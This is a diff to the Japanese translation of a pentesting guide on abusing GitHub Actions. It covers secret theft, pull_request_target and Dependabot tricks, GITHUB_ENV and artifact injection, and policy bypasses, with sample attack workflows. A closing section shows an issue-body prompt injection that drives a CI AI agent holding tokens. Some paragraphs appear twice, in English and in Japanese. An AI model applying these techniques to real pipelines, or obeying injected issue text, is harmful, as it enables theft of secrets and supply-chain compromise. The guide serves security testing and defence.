diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index cdf56afc9..2f4b8c54d 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -1,40 +1,40 @@
-# Github Actions を悪用する
+# Github Actionsの悪用
 
 {{#include ../../../banners/hacktricks-training.md}}
 
 ## ツール
 
-以下のツールは、Github Action ワークフローを見つけたり、脆弱なものを発見するのに役立ちます:
+以下のツールは、Github Actionのワークフローを見つけたり、脆弱なものを発見するのに役立ちます:
 
 - [https://github.com/CycodeLabs/raven](https://github.com/CycodeLabs/raven)
 - [https://github.com/praetorian-inc/gato](https://github.com/praetorian-inc/gato)
 - [https://github.com/AdnaneKhan/Gato-X](https://github.com/AdnaneKhan/Gato-X)
 - [https://github.com/carlospolop/PurplePanda](https://github.com/carlospolop/PurplePanda)
-- [https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - チェックリストは [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits) も確認してください
+- [https://github.com/zizmorcore/zizmor](https://github.com/zizmorcore/zizmor) - チェックリストも参照: [https://docs.zizmor.sh/audits](https://docs.zizmor.sh/audits)
 
 ## 基本情報
 
-このページには以下が含まれます:
+このページでは以下を扱います:
 
-- 攻撃者が Github Action にアクセスできた場合の**すべての影響の概要**
-- **アクションへのアクセスを得る**ためのさまざまな方法:
-- **アクションを作成するための権限**を持つこと
-- **pull request** 関連トリガーの悪用
+- 攻撃者がGithub Actionにアクセスした際の**すべての影響の要約**
+- アクションに**アクセスするためのさまざまな方法**:
+- アクションを作成する**permissionsを持っていること**
+- **pull request**関連のトリガーの悪用
 - **その他の外部アクセス**手法の悪用
-- 既に侵害されたリポジトリからの **Pivoting**
-- 最後に、内部からアクションを悪用するための **post-exploitation techniques to abuse an action from inside** に関するセクション
+- 既に侵害されたrepoからの**Pivoting**
+- 最後に、アクション内部から悪用するための**post-exploitation techniques to abuse an action from inside**（前述の影響を引き起こすための手法）のセクション
 
 ## 影響の概要
 
 導入については [**Github Actions check the basic information**](../basic-github-information.md#github-actions) を参照してください。
 
-もし **GitHub Actions 内で任意のコードを実行できる**、かつ **リポジトリ** 内であれば、次のことが可能になることがあります:
+もしリポジトリ内で**GitHub Actionsで任意のコードを実行できる**場合、以下が可能になることがあります:
 
-- パイプラインにマウントされた **secrets** を窃取し、パイプラインの権限を悪用して AWS や GCP などの外部プラットフォームへの不正アクセスを行う。
-- デプロイやその他の **artifacts** を改ざんする。
-- パイプラインがアセットをデプロイまたは保存している場合、最終製品を変更してサプライチェーン攻撃を実行することができる。
-- カスタムワーカーでコードを実行して、計算リソースを悪用したり他のシステムにピボットする。
-- `GITHUB_TOKEN` に紐づく権限によっては、リポジトリコードの上書きが可能になる。
+- **Steal secrets** がパイプラインにマウントされている場合、それらを盗み、**abuse the pipeline's privileges**して AWS や GCP などの外部プラットフォームへ不正アクセスする。
+- **Compromise deployments** やその他の **artifacts** を侵害する。
+- パイプラインがアセットをデプロイまたは保存している場合、最終成果物を改ざんしてサプライチェーン攻撃を可能にする。
+- **Execute code in custom workers** して計算リソースを悪用し、他のシステムへピボットする。
+- `GITHUB_TOKEN` に関連する権限次第では、リポジトリのコードを上書きすることができる。
 
 ## GITHUB_TOKEN
 
@@ -42,17 +42,17 @@
 
 <figure><img src="../../../images/image (86).png" alt=""><figcaption></figcaption></figure>
 
-このトークンは **Github Application will use** ものと同じなので、同じエンドポイントにアクセスできます: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
+このトークンは**Github Applicationが使用するものと同じ**なので、同じエンドポイントにアクセスできます: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
 
 > [!WARNING]
-> Github はリポジトリ間アクセスを許可する [**flow**](https://github.com/github/roadmap/issues/74) をリリースする予定であり、`GITHUB_TOKEN` を使用してリポジトリが他の内部リポジトリにアクセスできるようになります。
+> Githubは [**flow**](https://github.com/github/roadmap/issues/74) をリリースして、GitHub内で**allows cross-repository**アクセスを可能にする予定です。これにより、`GITHUB_TOKEN` を使ってリポジトリが他の内部repoにアクセスできるようになります。
 
-このトークンの可能な**権限**は以下で確認できます: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
+このトークンの可能な**permissions**は次で確認できます: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
 
-このトークンはジョブ完了後に**有効期限が切れる**ことに注意してください。\
-これらのトークンは次のような形式です: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
+トークンは**ジョブ完了後に期限切れ**になる点に注意してください。\
+これらのトークンは次のようになっています: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
 
-このトークンでできる興味深いことの例: 
+このトークンでできる面白いことのいくつか:
 
 {{#tabs }}
 {{#tab name="Merge PR" }}
@@ -91,11 +91,12 @@ https://api.github.com/repos/<org_name>/<repo_name>/pulls \
 {{#endtabs }}
 
 > [!CAUTION]
-> 複数の場面で、**Github Actions envs や secrets の中に github user tokens を見つけられることがある**点に注意してください。これらのトークンはリポジトリや組織に対してより多くの権限を与える可能性があります。
+> いくつかの場面では **github user tokens inside Github Actions envs or in the secrets** を見つけられることに注意してください。
+> これらのトークンはリポジトリや組織に対してより強い権限を与える可能性があります。
 
 <details>
 
-<summary>Github Action の出力で secrets を一覧表示する</summary>
+<summary>Github Action の出力にある secrets を一覧表示</summary>
 ```yaml
 name: list_env
 on:
@@ -121,7 +122,7 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 
 <details>
 
-<summary>シークレットを使ってリバースシェルを取得</summary>
+<summary>secrets を使って reverse shell を取得する</summary>
 ```yaml
 name: revshell
 on:
@@ -144,29 +145,29 @@ secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
 </details>
 
-他ユーザーのリポジトリでGithub Tokenに付与された権限は、アクションの**ログを確認することで**チェックできます:
+他ユーザーのリポジトリにおいてGithub Tokenに付与された権限は、actionsのログを確認することで把握できます:
 
 <figure><img src="../../../images/image (286).png" alt="" width="269"><figcaption></figcaption></figure>
 
-## 実行が許可されている場合
+## 許可された実行
 
 > [!NOTE]
-> これはGithub actionsを侵害する最も簡単な方法の一つです。このケースは、**organizationに新しいrepoを作成できる権限**または**リポジトリに対するwrite privileges**を持っていることを前提としています。
+> これはGithub actionsを侵害する最も簡単な方法の一つです。このケースは、**create a new repo in the organization** のアクセス権、またはリポジトリに対する **write privileges over a repository** を持っていることを前提としています。
 >
-> このような状況にある場合は、[Post Exploitation techniques](#post-exploitation-techniques-from-inside-an-action) を確認してください。
+> もしこのような状況にある場合は、[Post Exploitation techniques](#post-exploitation-techniques-from-inside-an-action) を参照してください。
 
-### Execution from Repo Creation
+### リポジトリ作成からの実行
 
-組織のメンバーが**create new repos**でき、かつあなたがGithub actionsを実行できる場合、**新しいrepoを作成して組織レベルで設定されたsecretsを盗む**ことができます。
+組織のメンバーが新しいリポジトリを作成でき、かつあなたがgithub actionsを実行できる場合、新しいリポジトリを作成して組織レベルで設定されたsecretsを盗み出すことができます。
 
 ### 新しいブランチからの実行
 
-既にGithub Actionが設定されているリポジトリ内に新しいブランチを作成できる場合、これを**modify**し、**upload**してから**その新しいブランチからそのactionを実行**できます。こうしてrepositoryおよびorganizationレベルのsecretsを**exfiltrate**できます（ただし、それらがどのように呼ばれているかを知っている必要があります）。
+既にGithub Actionが設定されているリポジトリに対して新しいブランチを作成できる場合、アクションを修正し、コンテンツをアップロードして、新しいブランチからそのアクションを実行できます。これにより、repositoryおよびorganizationレベルのsecretsをexfiltrateできます（ただし、秘密の名前を把握している必要があります）。
 
 > [!WARNING]
-> workflow YAML内だけに実装された制限（例: `on: push: branches: [main]`、ジョブの条件式、または手動ゲート）はコラボレータによって編集され得ます。外部での強制（branch protections、protected environments、protected tags）がない場合、contributorはワークフローの実行先を自分のブランチに変更し、マウントされたsecrets/permissionsを悪用できます。
+> workflow YAML 内だけで実装された制限（例えば、`on: push: branches: [main]`、ジョブの条件、または手動ゲート）はコラボレーターによって編集され得ます。外部による強制（branch protections、protected environments、protected tags）がない場合、コントリビューターはワークフローの実行ターゲットを自分のブランチに向け直し、マウントされたsecrets/permissionsを悪用できます。
 
-変更したactionは、**手動で**、**PRが作成されたとき**、または**コードがプッシュされたとき**に実行可能にすることができます（どれだけ目立たせるかによります）：
+変更したアクションは、**manually** に実行可能にしたり、**PR is created** の際や **some code is pushed** の際に実行させることができます（どれだけノイズを出すかによります）：
 ```yaml
 on:
 workflow_dispatch: # Launch manually
@@ -180,43 +181,43 @@ branches:
 ```
 ---
 
-## フォークされた実行
+## フォークによる実行
 
 > [!NOTE]
-> 様々なトリガーによって attacker が**別のリポジトリの Github Action を実行する**ことが可能になる場合があります。これらのトリガー可能なアクションが不適切に設定されていると、attacker がそれらを悪用できる可能性があります。
+> 攻撃者が別のリポジトリの **Github Action を実行する** ことを可能にするさまざまなトリガーがあります。これらのトリガーが不適切に設定されていると、攻撃者がそれらを悪用して侵害する可能性があります。
 
 ### `pull_request`
 
-The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+ワークフロートリガー **`pull_request`** は、いくつかの例外を除きプルリクエストが送信されるたびにワークフローを実行します：デフォルトでは **初めて** コラボレーションする場合、リポジトリの **メンテナ** がワークフローの **実行** を **承認** する必要があります：
 
 <figure><img src="../../../images/image (184).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+> デフォルトの制限は **初回の貢献者** に対するものなので、有効なバグ修正やタイプミスの修正で貢献した後に、新たに得た `pull_request` 権限を悪用するために別の PR を送ることが可能です。
 >
-> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+> **これを試しましたが、動作しませんでした**：~~別の選択肢として、そのプロジェクトに貢献した人物と同じ名前のアカウントを作成し、その人物のアカウントを削除するという手法が考えられます。~~
 
-Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+さらに、デフォルトではターゲットリポジトリへの **書き込み権限** と **シークレットへのアクセス** を防ぐようになっており、詳細は[**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories)に記載されています：
 
 > With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
 
-attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+攻撃者は Github Action の定義を変更して任意の処理を実行したり任意のアクションを追加したりできます。しかし、前述の制限によりシークレットを盗んだりリポジトリを上書きしたりすることはできません。
 
 > [!CAUTION]
-> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+> **はい、攻撃者が PR でトリガーされる github action を変更した場合、その攻撃者の Github Action が使用され、オリジンリポジトリのものは使われません！**
 
-As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+攻撃者は実行されるコードも制御しているため、`GITHUB_TOKEN` にシークレットや書き込み権限がなくても、例えば **悪意のあるアーティファクトをアップロードする** といったことが可能です。
 
 ### **`pull_request_target`**
 
-The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+ワークフロートリガー **`pull_request_target`** はターゲットリポジトリに対して **書き込み権限** を持ち、**シークレットへのアクセス** を持ちます（承認を要求しません）。
 
-Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
-Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+注意：ワークフロートリガー **`pull_request_target`** は **base のコンテキストで実行され**、PR が与えるコンテキストでは実行されません（信頼できないコードを実行しないため）。`pull_request_target` の詳細は [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
+さらに、この特定の危険な使用法については [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/) を参照してください。
 
-It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+実行されるワークフローが **base に定義されたもの** で **PR のものではない** ため `pull_request_target` を使うのは **安全** に見えるかもしれませんが、安全でない場合がいくつかあります。
 
-An this one will have **access to secrets**.
+また、こちらは **シークレットへのアクセス** を持ちます。
 
 ### `workflow_run`
 
@@ -230,28 +231,34 @@ workflows: [Run Tests]
 types:
 - completed
 ```
-さらに、ドキュメントによると: `workflow_run` イベントで開始された workflow は、前の workflow がそうでなかったとしても **secrets にアクセスし、write tokens を利用できる**。
+Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
 
-この種の workflow は、外部ユーザが **`pull_request`** または **`pull_request_target`** を介してトリガーできる **workflow** に**依存している**場合、攻撃される可能性があります。脆弱な例はいくつか[**このブログで見つかります**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)。最初の例は、`workflow_run` によってトリガーされた workflow が攻撃者のコード `${{ github.event.pull_request.head.sha }}` をダウンロードするものです。\ 二つ目は、**untrusted** コードから **artifact** を **`workflow_run`** workflow に渡し、その artifact の内容を使うことで **RCE に脆弱** になるパターンです。
+この種の workflow は、外部ユーザーが **`pull_request`** または **`pull_request_target`** 経由でトリガーできる **workflow** に依存している場合、攻撃の対象になり得る。脆弱な例がいくつか [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability) にある。最初の例は **`workflow_run`** によってトリガーされた workflow が攻撃者のコードをダウンロードする（`${{ github.event.pull_request.head.sha }}` を使用する）というものだ。2つ目は **untrusted** コードから **artifact** を **`workflow_run`** workflow に渡し、その artifact の内容を用いることで **RCE に対して脆弱** になるパターンである。
 
 ### `workflow_call`
 
 TODO
 
-TODO: pull_request から実行されたときに、使用/ダウンロードされるコードが origin のものか forked PR のものかを確認する
+TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
 
-## フォークされた実行の悪用
+## Abusing Forked Execution
 
-外部の攻撃者が GitHub workflow を実行させる方法は述べました。ここでは、これらの実行が不適切に設定されている場合にどのように悪用され得るかを見ていきます：
+外部攻撃者が github workflow を実行させる方法はすでに述べたので、ここでは設定が不適切な場合にその実行がどのように悪用され得るかを見ていく。
 
-### Untrusted checkout 実行
+### Untrusted checkout execution
 
-**`pull_request`** の場合、workflow は **PR のコンテキスト** で実行されます（つまり **悪意ある PR のコード** が実行されます）が、実行には誰かの **承認が必要** で、いくつかの [制限](#pull_request) の下で実行されます。
+In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](#pull_request).
 
-**`pull_request_target` or `workflow_run`** を使用し、`pull_request_target` または `pull_request` からトリガーされ得る workflow に依存する場合、元のリポジトリのコードが実行されるため、**攻撃者は実行されるコードを制御できません**。
+`pull_request` の場合、workflow は PR のコンテキストで実行され（つまり **malicious PRs code** が実行される）、ただし誰かが **まずそれを承認する必要があり**、[limitations](#pull_request) が適用される。
+
+In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
+
+`pull_request_target` や `workflow_run` を使う workflow が `pull_request_target` や `pull_request` からトリガーされ得る workflow に依存している場合、元のリポジトリのコードが実行されるため、**攻撃者は実行されるコードを制御できない**。
 
 > [!CAUTION]
-> しかし、もしその **action** が PR コードを **PR から取得する** という **明示的な checkout** を行っている場合（base からではなく）、攻撃者が制御するコードが使用されます。例えば（12行目で PR のコードがダウンロードされているのを確認してください）:
+> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
+
+> しかし、もしその **action** が **明示的な PR checkout** を行い、**PR からコードを取得する**（base からではない）場合、攻撃者が制御するコードが使用される。例えば（PR コードがダウンロードされる行 12 を確認）:
 
 <pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
 on:
@@ -281,14 +288,20 @@ message: |
 Thank you!
 </code></pre>
 
-ビルドスクリプトや参照されている **packages は PR の作成者によって制御される** ため、`npm install` や `npm build` の実行中に **潜在的に untrusted なコードが実行されます**。
+The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
+
+潜在的に **untrusted code は `npm install` や `npm build` の間に実行されている**。ビルドスクリプトや参照される **packages は PR の作成者によって制御されている**。
 
 > [!WARNING]
-> 脆弱な actions を検索するための GitHub dork は: `event.pull_request pull_request_target extension:yml` ですが、action が不安全に設定されている場合でも、実行されるジョブを安全に構成する方法はいくつかあります（例えば PR を生成する actor が誰かに関する条件分岐を使うなど）。
+> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
+
+> 脆弱な actions を検索するための github dork は `event.pull_request pull_request_target extension:yml` だが、action が insecure に設定されていても、ジョブを安全に実行するように設定する方法はいくつかある（例えば PR を生成する actor に関する条件分岐を使うなど）。
 
 ### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
 
-PR を作成する **user** が値を **制御** している特定の [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) があることに注意してください。もし GitHub Action がその **データを何かを実行するために使っている** 場合、**任意のコード実行** に繋がる可能性があります：
+Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
+
+PR を作成する **user** によって値が **制御されている** 特定の [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) があることに注意。もし github action がその **data を使って何かを実行している** 場合、任意のコード実行につながる可能性がある。
 
 {{#ref}}
 gh-actions-context-script-injections.md
@@ -296,17 +309,25 @@ gh-actions-context-script-injections.md
 
 ### **GITHUB_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
 
-ドキュメントによると: 環境変数を定義または更新し、それを **`GITHUB_ENV`** 環境ファイルに書き込むことで、ワークフロージョブの後続のステップからその環境変数を利用可能にできます。
+From the docs: You can make an **environment variable available to any subsequent steps** in a workflow job by defining or updating the environment variable and writing this to the **`GITHUB_ENV`** environment file.
 
-攻撃者がこの **env** 変数に任意の値を **注入** できる場合、後続のステップでコードを実行させるような環境変数（例: **LD_PRELOAD**, **NODE_OPTIONS**）を注入できる可能性があります。
+ドキュメントによると：環境変数を定義または更新し、それを **`GITHUB_ENV`** 環境ファイルに書き込むことで、ワークフロージョブの後続のステップからその **environment variable を利用可能にできる**。
 
-例えば（[**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) と [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)）、アップロードされた artifact の内容を **`GITHUB_ENV`** 環境変数に保存することを信頼している workflow を想像してください。攻撃者はそれを悪用するために次のようなものをアップロードできます：
+If an attacker could **inject any value** inside this **env** variable, he could inject env variables that could execute code in following steps such as **LD_PRELOAD** or **NODE_OPTIONS**.
+
+攻撃者がこの **env** 変数に任意の値を **inject** できると、以降のステップでコードを実行させるような環境変数（例えば **LD_PRELOAD** や **NODE_OPTIONS**）を注入できる可能性がある。
+
+For example ([**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) and [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)), imagine a workflow that is trusting an uploaded artifact to store its content inside **`GITHUB_ENV`** env variable. An attacker could upload something like this to compromise it:
+
+例えば（[**this**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability-0) と [**this**](https://www.legitsecurity.com/blog/-how-we-found-another-github-action-environment-injection-vulnerability-in-a-google-project)）、アップロードされた artifact の内容を **`GITHUB_ENV`** の env 変数に格納することを信頼している workflow を想像してみよう。攻撃者はそれを悪用するために次のようなものをアップロードできる：
 
 <figure><img src="../../../images/image (261).png" alt=""><figcaption></figcaption></figure>
 
-### Dependabot およびその他の信頼された bot
+### Dependabot and other trusted bots
 
-[**this blog post**](https://boostsecurity.io/blog/weaponizing-dependabot-pwn-request-at-its-finest) にあるように、いくつかの組織は `dependabot[bot]` からのすべての PR をマージする GitHub Action を持っています。例えば：
+As indicated in [**this blog post**](https://boostsecurity.io/blog/weaponizing-dependabot-pwn-request-at-its-finest), several organizations have a Github Action that merges any PRR from `dependabot[bot]` like in:
+
+[**this blog post**](https://boostsecurity.io/blog/weaponizing-dependabot-pwn-request-at-its-finest) にあるように、いくつかの組織では `dependabot[bot]` からのあらゆる PR をマージする Github Action を持っている（例えば次のように）：
 ```yaml
 on: pull_request_target
 jobs:
@@ -318,12 +339,12 @@ steps:
 ```
 Which is a problem because the `github.actor` field contains the user who caused the latest event that triggered the workflow. And There are several ways to make the `dependabot[bot]` user to modify a PR. For example:
 
-- 被害者のリポジトリをフォークする
-- 自分のコピーに悪意あるペイロードを追加する
-- 自分のフォークで Dependabot を有効化して古い依存関係を追加する。Dependabot はその依存関係を修正するブランチを作成し、そこに悪意あるコードが入る。
-- そのブランチから被害者リポジトリへ Pull Request を作成する（この PR はユーザーが作成するため、まだ何も起こらない）
-- 次に、攻撃者はフォーク内で Dependabot が最初に開いた PR に戻り、`@dependabot recreate` を実行する
-- すると Dependabot がそのブランチでいくつかのアクションを実行し、被害者リポジトリ上の PR を変更する。これにより、最新のイベントを引き起こした actor が `dependabot[bot]` になり（そのためワークフローが実行される）。
+- 被害者のリポジトリを fork する
+- 自分のコピーに悪意のあるペイロードを追加する
+- 自分の fork で Dependabot を有効にし、古い依存関係を追加する。Dependabot はその依存関係を修正するブランチを作成し、そこに悪意あるコードが含まれる
+- そのブランチから被害者リポジトリへ Pull Request を開く（PR はユーザーによって作成されるため、まだ何も起きない）
+- 次に、攻撃者は自分の fork で Dependabot が最初に開いた PR に戻り、`@dependabot recreate` を実行する
+- すると Dependabot がそのブランチでいくつかのアクションを実行し、被害者リポジトリ上の PR を変更する。これにより `dependabot[bot]` がワークフローをトリガーした最新イベントの actor になり（したがって、ワークフローが実行される）
 
 Moving on, what if instead of merging the Github Action would have a command injection like in:
 ```yaml
@@ -337,20 +358,20 @@ steps:
 ```
 Well, the original blogpost proposes two options to abuse this behavior being the second one:
 
-- Fork the victim repository and enable Dependabot with some outdated dependency.
-- Create a new branch with the malicious shell injection code.
-- Change the default branch of the repo to that one
-- Create a PR from this branch to the victim repository.
-- Run `@dependabot merge` in the PR Dependabot opened in his fork.
-- Dependabot will merge his changes in the default branch of your forked repository, updating the PR in the victim repository making now the `dependabot[bot]` the actor of the latest event that triggered the workflow and using a malicious branch name.
+- ターゲットの repository を fork し、古い dependency を使うよう Dependabot を有効化する。
+- 悪意のある shell injeciton code を含む新しい branch を作成する。
+- repo の default branch をその branch に変更する
+- この branch からターゲットの repository に対して PR を作成する。
+- 彼の fork で Dependabot が開いた PR 内で `@dependabot merge` を実行する。
+- Dependabot は fork した repository の default branch に変更を merge し、victim repository の PR を更新します。結果として、ワークフローをトリガーした最新のイベントのアクターが `dependabot[bot]` になり、悪意のある branch 名が使用されるようになります。
 
-### 脆弱なサードパーティ製 GitHub Actions
+### Vulnerable Third Party Github Actions
 
 #### [dawidd6/action-download-artifact](https://github.com/dawidd6/action-download-artifact)
 
 As mentioned in [**this blog post**](https://www.legitsecurity.com/blog/github-actions-that-open-the-door-to-cicd-pipeline-attacks), this Github Action allows to access artifacts from different workflows and even repositories.
 
-The thing problem is that if the **`path`** parameter isn't set, the artifact is extracted in the current directory and it can override files that could be later used or even executed in the workflow. Therefore, if the Artifact is vulnerable, an attacker could abuse this to compromise other workflows trusting the Artifact.
+問題となるのは、**`path`** パラメータが設定されていない場合、artifact がカレントディレクトリに展開され、後で workflow 内で使用されたり実行されたりする可能性のあるファイルを上書きしてしまう点です。したがって、Artifact が脆弱であれば、攻撃者はこれを悪用して Artifact を信頼するその他の workflows を乗っ取ることができます。
 
 Example of vulnerable workflow:
 ```yaml
@@ -375,7 +396,7 @@ with:
 name: artifact
 path: ./script.py
 ```
-これは次の workflow を使って攻撃できます:
+これは次のワークフローで攻撃できます:
 ```yaml
 name: "some workflow"
 on: pull_request
@@ -392,7 +413,7 @@ path: ./script.py
 ```
 ---
 
-## Other External Access
+## その他の外部アクセス
 
 ### Deleted Namespace Repo Hijacking
 
@@ -412,7 +433,7 @@ If other repositories where using **dependencies from this user repos**, an atta
 
 ### Cache Poisoning
 
-A cache is maintained between **wokflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
+A cache is maintained between **workflow runs in the same branch**. Which means that if an attacker **compromise** a **package** that is then stored in the cache and **downloaded** and executed by a **more privileged** workflow he will be able to **compromise** also that workflow.
 
 {{#ref}}
 gh-actions-cache-poisoning.md
@@ -434,7 +455,7 @@ gh-actions-artifact-poisoning.md
 
 As commented in [**this blog post**](https://blog.yossarian.net/2025/06/11/github-actions-policies-dumb-bypass), even if a repository or organization has a policy restricting the use of certain actions, an attacker could just download (`git clone`) and action inside the workflow and then reference it as a local action. As the policies doesn't affect local paths, **the action will be executed without any restriction.**
 
-Example:
+例:
 ```yaml
 on: [push, pull_request]
 
@@ -455,9 +476,9 @@ path: gha-hazmat
 
 - run: ls tmp/checkout
 ```
-### OIDC を介した AWS、Azure、GCP へのアクセス
+### OIDC経由でのAWS、Azure、GCPへのアクセス
 
-Check the following pages:
+次のページを確認してください:
 
 {{#ref}}
 ../../../pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md
@@ -473,13 +494,13 @@ Check the following pages:
 
 ### シークレットへのアクセス <a href="#accessing-secrets" id="accessing-secrets"></a>
 
-スクリプトにコンテンツを注入している場合、シークレットにどのようにアクセスできるかを知っておくと有用です:
+スクリプトにコンテンツを注入する場合、シークレットにアクセスする方法を知っておくと便利です。
 
-- シークレットやトークンが**環境変数**として設定されている場合、**`printenv`** を使って環境から直接取得できます。
+- シークレットやトークンが**環境変数**に設定されている場合、**`printenv`**で環境から直接アクセスできます。
 
 <details>
 
-<summary>Github Action output のシークレットを一覧表示</summary>
+<summary>Github Actionの出力にシークレットを一覧表示</summary>
 ```yaml
 name: list_env
 on:
@@ -571,7 +592,7 @@ Tip: for stealth during testing, encrypt before printing (openssl is preinstalle
 
 ### AI Agent Prompt Injection & Secret Exfiltration in CI/CD
 
-LLM-driven workflows such as Gemini CLI, Claude Code Actions, OpenAI Codex, or GitHub AI Inference increasingly appear inside Actions/GitLab pipelines. As shown in [PromptPwnd](https://www.aikido.dev/blog/promptpwnd-github-actions-ai-agents), these agents often ingest untrusted repository metadata while holding privileged tokens and the ability to invoke `run_shell_command` or GitHub CLI helpers, so any field that attackers can edit (issues, PRs, commit messages, release notes, comments) becomes a control surface for the runner.
+Gemini CLI、Claude Code Actions、OpenAI Codex、または GitHub AI Inference のような LLM 駆動のワークフローが Actions/GitLab パイプライン内に増えています。[PromptPwnd](https://www.aikido.dev/blog/promptpwnd-github-actions-ai-agents) に示されているように、これらのエージェントは特権トークンや `run_shell_command` や GitHub CLI ヘルパーを呼び出す能力を持ったまま、信頼できないリポジトリのメタデータを取り込むことが多いため、攻撃者が編集可能な任意のフィールド（issues、PRs、commit messages、release notes、comments）がランナーに対するコントロールサーフェスになります。
 
 #### Typical exploitation chain
 
@@ -590,7 +611,7 @@ ISSUE_BODY: '${{ github.event.issue.body }}'
 prompt: |
 2. Review the issue title and body: "${ISSUE_TITLE}" and "${ISSUE_BODY}".
 ```
-同じジョブは `GEMINI_API_KEY`、`GOOGLE_CLOUD_ACCESS_TOKEN`、および書き込み権限を持つ `GITHUB_TOKEN` を露出させ、さらに `run_shell_command(gh issue comment)`、`run_shell_command(gh issue view)`、`run_shell_command(gh issue edit)` といったツールも持っていました。悪意のある issue 本文は実行可能な命令を密輸できる:
+同じジョブは `GEMINI_API_KEY`、`GOOGLE_CLOUD_ACCESS_TOKEN`、書き込み可能な `GITHUB_TOKEN` を公開し、さらに `run_shell_command(gh issue comment)`、`run_shell_command(gh issue view)`、`run_shell_command(gh issue edit)` のようなツールも含んでいました。悪意のある issue 本文は実行可能な命令を密輸することができます：
 ```
 The login button does not work.
 -- Additional GEMINI.md instruction --
@@ -621,12 +642,12 @@ In self-hosted runners it's also possible to obtain the **secrets from the \_Run
 sudo apt-get install -y gdb
